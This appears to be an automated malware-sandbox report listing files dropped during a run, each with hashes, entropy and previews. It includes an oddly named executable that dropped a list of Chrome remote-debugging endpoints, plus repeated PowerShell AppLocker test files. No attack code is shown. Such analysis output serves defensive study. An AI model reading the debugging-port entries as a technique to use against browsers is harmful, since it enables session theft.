                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1787
                                                                                                                                                                      Entropy (8bit):5.38342112239446
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:SfNaoCtzTECIfNaoCkCSfNaoCJCMfNaoC7GT0UrU0U8C7+:6NnCtzTECUNnCkC6NnCJC4NnCu0UrU03
                                                                                                                                                                      MD5:F383E5379A83CC209E37A893BE99B5ED
                                                                                                                                                                      SHA1:CC9D2FB9E8931A37CEFA96697B09E7A7D8914258
                                                                                                                                                                      SHA-256:7D79E291347C08D33FF3FC013C002E86D8067B4B6EF9E534C17B73FCEA4830E7
                                                                                                                                                                      SHA-512:8509E1845253115C77F2EE03331B57F38BDB19751E77D5230E4F78E46E3EA646B322935082B20F3FE83447B42B201963F0D3F123D91A13D494192BFCD07FFB40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2C2CD0CB75C419D746861E3EEC8EEBB8",.. "id": "2C2CD0CB75C419D746861E3EEC8EEBB8",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2C2CD0CB75C419D746861E3EEC8EEBB8"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/305BD73A88D01DB3AB7CC166E81CB9DC",.. "id": "305BD73A88D01DB3AB7CC166E81CB9DC",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/305BD73A88D01DB3AB7CC166E81CB9DC"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (4457)
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):4462
                                                                                                                                                                      Entropy (8bit):5.804398259918102
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:YLJAliDIN6666VY4kWIoJ4FMgkSoJzL921oSeokAKrixIgqffffffL:Y0vN6666VY4fI4SBpELEeOU7
                                                                                                                                                                      MD5:AE758E551E34D9E9383944395BB13317
                                                                                                                                                                      SHA1:350AA97096AABC18A42CD6D4CBECC02C0337F857
                                                                                                                                                                      SHA-256:14A0E24572BE4120C37108A491576C6CC9292FD40C1854975E201B22463B823F
                                                                                                                                                                      SHA-512:3707C9F16728F8993B625F25C5505BF7B3A4702EF670B7E9FF2B637628DFDEAD981B598F85566E4B6CF1FBA859E081C27EF176311B3EFA6BA45C2395369705A5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                      Preview:)]}'.["",["path of exile early access classes","surviving barstool cast","princess cruises man overboard","spotify wrapped 2024 artists","trevor lawrence texans","playstation ps5 30th anniversary","china bans exports","skeleton crew star wars"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXM1NzVfbWhwEhFUZWxldmlzaW9uIHNlcmllczKTFGRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFDQXdFQkFRQUFBQUFBQUFBQUFBQUVCZ01GQndJQkFQL0VBREVRQUFFREFnUUZBd1FBQndFQUFBQUFBQU
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):134253
                                                                                                                                                                      Entropy (8bit):5.441529892000257
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:fbkX33ov7GsG688fJbk/5xnsPLWjwR2i6o:fs3lr6t2/5xnsPawR8o
                                                                                                                                                                      MD5:639AEFC048D1BE1731F903208B1711B4
                                                                                                                                                                      SHA1:73F3ADAB0D34EC58B425A63A79B042188278F4F9
                                                                                                                                                                      SHA-256:2054CBCA8EEA847E6FB52484A32752A41165EA72180FBB6357ED852BF815D75E
                                                                                                                                                                      SHA-512:01E4F5DF8C78E96CEEB9CBB8853E4F007C15550FA779C9B879CA64AEC3950248B9C9B21BF17539D6AF3D58F706DE8F8BF844C101E5A663B6354DCB9F106ACDFC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
